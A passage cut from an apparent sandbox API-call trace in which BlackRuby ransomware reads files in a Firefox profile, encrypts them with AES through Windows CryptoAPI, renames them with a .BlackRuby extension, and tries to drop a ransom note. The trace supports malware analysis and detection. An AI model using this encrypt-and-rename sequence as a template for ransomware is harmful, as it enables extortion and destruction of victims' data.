lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_AYqjeTdpZIwJqW3Kq4Nf7mX8ARgAqNV4ByNMwdD6v0n.BlackRuby", lpFilePart=0x0) returned 0x8a [0052.359] GetLastError () returned 0xb7 [0052.359] SetErrorMode (uMode=0x1) returned 0x0 [0052.360] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\downloads.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\downloads.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c6aeea0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x8c6aeea0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x276a1940, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x18110)) returned 1 [0052.360] GetLastError () returned 0xb7 [0052.360] SetErrorMode (uMode=0x0) returned 0x1 [0052.360] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\downloads.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\downloads.sqlite"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_AYqjeTdpZIwJqW3Kq4Nf7mX8ARgAqNV4ByNMwdD6v0n.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\encrypted_ayqjetdpziwjqw3kq4nf7mx8argaqnv4bynmwdd6v0n.blackruby")) returned 1 [0052.360] GetLastError () returned 0xb7 [0052.360] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x63 [0052.360] GetLastError () returned 0xb7 [0052.360] SetErrorMode (uMode=0x1) returned 0x0 [0052.360] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0052.361] GetLastError () returned 0x5 [0052.361] SetErrorMode (uMode=0x0) returned 0x1 [0052.362] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\extensions.ini", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\extensions.ini", lpFilePart=0x0) returned 0x59 [0052.362] GetLastError () returned 0x5 [0052.362] SetErrorMode (uMode=0x1) returned 0x0 [0052.362] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\extensions.ini" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.ini"), fInfoLevelId=0x0, lpFileInformation=0x1be83fc | out: lpFileInformation=0x1be83fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x83553fa0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x83553fa0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x83553fa0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x87)) returned 1 [0052.362] GetLastError () returned 0x5 [0052.362] SetErrorMode (uMode=0x0) returned 0x1 [0052.362] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x63 [0052.362] GetLastError () returned 0x5 [0052.362] SetErrorMode (uMode=0x1) returned 0x0 [0052.362] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0052.362] GetLastError () returned 0x5 [0052.363] SetErrorMode (uMode=0x0) returned 0x1 [0052.363] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\extensions.sqlite", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\extensions.sqlite", lpFilePart=0x0) returned 0x5c [0052.363] GetLastError () returned 0x5 [0052.363] SetErrorMode (uMode=0x1) returned 0x0 [0052.363] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\extensions.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x1c060ac | out: lpFileInformation=0x1c060ac*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7e0ad140, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7e0ad140, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x83507ce0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x70000)) returned 1 [0052.364] GetLastError () returned 0x5 [0052.364] SetErrorMode (uMode=0x0) returned 0x1 [0052.364] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\extensions.sqlite", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\extensions.sqlite", lpFilePart=0x0) returned 0x5c [0052.364] GetLastError () returned 0x5 [0052.364] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\extensions.sqlite", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\extensions.sqlite", lpFilePart=0x0) returned 0x5c [0052.364] GetLastError () returned 0x5 [0052.364] SetErrorMode (uMode=0x1) returned 0x0 [0052.364] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\extensions.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0052.364] GetLastError () returned 0x0 [0052.364] GetFileType (hFile=0x184) returned 0x1 [0052.364] SetErrorMode (uMode=0x0) returned 0x1 [0052.364] GetFileType (hFile=0x184) returned 0x1 [0052.364] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0x70000 [0052.364] GetLastError () returned 0x0 [0052.367] ReadFile (in: hFile=0x184, lpBuffer=0x2d00a00, nNumberOfBytesToRead=0x70000, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x2d00a00*, lpNumberOfBytesRead=0x18eb68*=0x70000, lpOverlapped=0x0) returned 1 [0052.390] GetLastError () returned 0x0 [0052.390] CloseHandle (hObject=0x184) returned 1 [0052.390] GetLastError () returned 0x0 [0052.393] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\extensions.sqlite", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\extensions.sqlite", lpFilePart=0x0) returned 0x5c [0052.393] GetLastError () returned 0x0 [0052.393] SetErrorMode (uMode=0x1) returned 0x0 [0052.393] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\extensions.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7e0ad140, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7e0ad140, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x83507ce0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x70000)) returned 1 [0052.393] GetLastError () returned 0x0 [0052.394] SetErrorMode (uMode=0x0) returned 0x1 [0052.404] CryptImportKey (in: hProv=0x37c708, pbData=0x1c61f80, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360de0) returned 1 [0052.404] GetLastError () returned 0x0 [0052.404] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0052.404] GetLastError () returned 0x0 [0052.409] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0052.409] GetLastError () returned 0x0 [0052.409] CryptDuplicateKey (in: hKey=0x360de0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360ce0) returned 1 [0052.409] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0052.410] GetLastError () returned 0x0 [0052.410] CryptSetKeyParam (hKey=0x360ce0, dwParam=0x4, pbData=0x1c8efcc*=0x1, dwFlags=0x0) returned 1 [0052.410] GetLastError () returned 0x0 [0052.410] CryptSetKeyParam (hKey=0x360ce0, dwParam=0x1, pbData=0x1c8ef98, dwFlags=0x0) returned 1 [0052.410] GetLastError () returned 0x0 [0052.413] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2de0b40*, pdwDataLen=0x18eb58*=0x70100, dwBufLen=0x70100 | out: pbData=0x2de0b40*, pdwDataLen=0x18eb58*=0x70100) returned 1 [0052.416] GetLastError () returned 0x0 [0052.421] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c8f028*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1c8f028*, pdwDataLen=0x18eb70*=0x10) returned 1 [0052.421] GetLastError () returned 0x0 [0052.421] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c8f058*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1c8f058*, pdwDataLen=0x18eb78*=0x10) returned 1 [0052.421] GetLastError () returned 0x0 [0052.441] CryptDestroyKey (hKey=0x360de0) returned 1 [0052.441] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0052.441] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0052.442] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\extensions.sqlite", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\extensions.sqlite", lpFilePart=0x0) returned 0x5c [0052.442] GetLastError () returned 0x0 [0052.442] SetErrorMode (uMode=0x1) returned 0x0 [0052.442] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\extensions.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.sqlite"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0052.446] GetLastError () returned 0xb7 [0052.446] GetFileType (hFile=0x184) returned 0x1 [0052.446] SetErrorMode (uMode=0x0) returned 0x1 [0052.446] GetFileType (hFile=0x184) returned 0x1 [0052.446] WriteFile (in: hFile=0x184, lpBuffer=0x2ae8450*, nNumberOfBytesToWrite=0x70110, lpNumberOfBytesWritten=0x18eb74, lpOverlapped=0x0 | out: lpBuffer=0x2ae8450*, lpNumberOfBytesWritten=0x18eb74*=0x70110, lpOverlapped=0x0) returned 1 [0052.452] GetLastError () returned 0xb7 [0052.453] CloseHandle (hObject=0x184) returned 1 [0052.456] GetLastError () returned 0xb7 [0052.456] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\extensions.sqlite", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\extensions.sqlite", lpFilePart=0x0) returned 0x5c [0052.456] GetLastError () returned 0xb7 [0052.456] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_Mt6iqFjURyLv7ukOHjOuJGBC4k7HlGqzkc4i.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_Mt6iqFjURyLv7ukOHjOuJGBC4k7HlGqzkc4i.BlackRuby", lpFilePart=0x0) returned 0x83 [0052.456] GetLastError () returned 0xb7 [0052.456] SetErrorMode (uMode=0x1) returned 0x0 [0052.456] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\extensions.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7e0ad140, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7e0ad140, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x27786180, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x70110)) returned 1 [0052.456] GetLastError () returned 0xb7 [0052.456] SetErrorMode (uMode=0x0) returned 0x1 [0052.456] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\extensions.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.sqlite"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_Mt6iqFjURyLv7ukOHjOuJGBC4k7HlGqzkc4i.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\encrypted_mt6iqfjurylv7ukohjoujgbc4k7hlgqzkc4i.blackruby")) returned 1 [0052.456] GetLastError () returned 0xb7 [0052.457] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x63 [0052.457] GetLastError () returned 0xb7 [0052.457] SetErrorMode (uMode=0x1) returned 0x0 [0052.457] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0052.457] GetLastError () returned 0x5 [0052.459] SetErrorMode (uMode=0x0) returned 0x1 [0052.459] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\healthreport.sqlite", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\healthreport.sqlite", lpFilePart=0x0) returned 0x5e [0052.459] GetLastError () returned 0x5 [0052.459] SetErrorMode (uMode=0x1) returned 0x0 [0052.459] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\healthreport.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\healthreport.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x1b41c04 | out: lpFileInformation=0x1b41c04*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc1711ed0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc1711ed0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xe9dad5d0, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0x118000)) returned 1 [0052.459] GetLastError () returned 0x5 [0052.459] SetErrorMode (uMode=0x0) returned 0x1 [0052.460] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\healthreport.sqlite", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\healthreport.sqlite", lpFilePart=0x0) returned 0x5e [0052.460] GetLastError () returned 0x5 [0052.460] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\healthreport.sqlite", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\healthreport.sqlite", lpFilePart=0x0) returned 0x5e [0052.460] GetLastError () returned 0x5 [0052.460] SetErrorMode (uMode=0x1) returned 0x0 [0052.460] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\healthreport.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\healthreport.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0052.460] GetLastError () returned 0x0 [0052.460] GetFileType (hFile=0x184) returned 0x1 [0052.460] SetErrorMode (uMode=0x0) returned 0x1 [0052.460] GetFileType (hFile=0x184) returned 0x1 [0052.460] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0x118000 [0052.460] GetLastError () returned 0x0 [0052.464] ReadFile (in: hFile=0x184, lpBuffer=0x2c008d0, nNumberOfBytesToRead=0x118000, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x2c008d0*, lpNumberOfBytesRead=0x18eb68*=0x118000, lpOverlapped=0x0) returned 1 [0052.503] GetLastError () returned 0x0 [0052.503] CloseHandle (hObject=0x184) returned 1 [0052.503] GetLastError () returned 0x0 [0052.507] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\healthreport.sqlite", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\healthreport.sqlite", lpFilePart=0x0) returned 0x5e [0052.507] GetLastError () returned 0x0 [0052.507] SetErrorMode (uMode=0x1) returned 0x0 [0052.507] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\healthreport.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\healthreport.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc1711ed0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc1711ed0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xe9dad5d0, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0x118000)) returned 1 [0052.507] GetLastError () returned 0x0 [0052.507] SetErrorMode (uMode=0x0) returned 0x1 [0052.507] CryptAcquireContextW (in: phProv=0x18eb30, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18eb30*=0x37c708) returned 1 [0052.508] GetLastError () returned 0x0 [0052.542] CryptImportKey (in: hProv=0x37c708, pbData=0x1b9dd10, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360ee0) returned 1 [0052.542] GetLastError () returned 0x0 [0052.542] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0052.542] GetLastError () returned 0x0 [0052.547] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0052.547] GetLastError () returned 0x0 [0052.547] CryptDuplicateKey (in: hKey=0x360ee0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360ce0) returned 1 [0052.547] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0052.547] GetLastError () returned 0x0 [0052.547] CryptSetKeyParam (hKey=0x360ce0, dwParam=0x4, pbData=0x1bcad5c*=0x1, dwFlags=0x0) returned 1 [0052.547] GetLastError () returned 0x0 [0052.547] CryptSetKeyParam (hKey=0x360ce0, dwParam=0x1, pbData=0x1bcad28, dwFlags=0x0) returned 1 [0052.547] GetLastError () returned 0x0 [0052.558] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x30d8da0*, pdwDataLen=0x18eb58*=0x118100, dwBufLen=0x118100 | out: pbData=0x30d8da0*, pdwDataLen=0x18eb58*=0x118100) returned 1 [0052.566] GetLastError () returned 0x0 [0052.581] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b24374*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1b24374*, pdwDataLen=0x18eb70*=0x10) returned 1 [0052.581] GetLastError () returned 0x0 [0052.581] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b243a4*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1b243a4*, pdwDataLen=0x18eb78*=0x10) returned 1 [0052.581] GetLastError () returned 0x0 [0052.603] CryptDestroyKey (hKey=0x360ee0) returned 1 [0052.603] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0052.603] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0052.603] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\healthreport.sqlite", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\healthreport.sqlite", lpFilePart=0x0) returned 0x5e [0052.603] GetLastError () returned 0x0 [0052.603] SetErrorMode (uMode=0x1) returned 0x0 [0052.603] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\healthreport.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\healthreport.sqlite"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0052.604] GetLastError () returned 0xb7 [0052.604] GetFileType (hFile=0x184) returned 0x1 [0052.604] SetErrorMode (uMode=0x0) returned 0x1 [0052.604] GetFileType (hFile=0x184) returned 0x1 [0052.620] CloseHandle (hObject=0x184) returned 1 [0052.620] GetLastError () returned 0xb7 [0052.620] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\healthreport.sqlite", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\healthreport.sqlite", lpFilePart=0x0) returned 0x5e [0052.620] GetLastError () returned 0xb7 [0052.620] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_wb0AzMt87EjY1iSuYGmPN02PVYLFTybn7R9aF.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_wb0AzMt87EjY1iSuYGmPN02PVYLFTybn7R9aF.BlackRuby", lpFilePart=0x0) returned 0x84 [0052.621] GetLastError () returned 0xb7 [0052.621] SetErrorMode (uMode=0x1) returned 0x0 [0052.621] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\healthreport.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\healthreport.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc1711ed0, 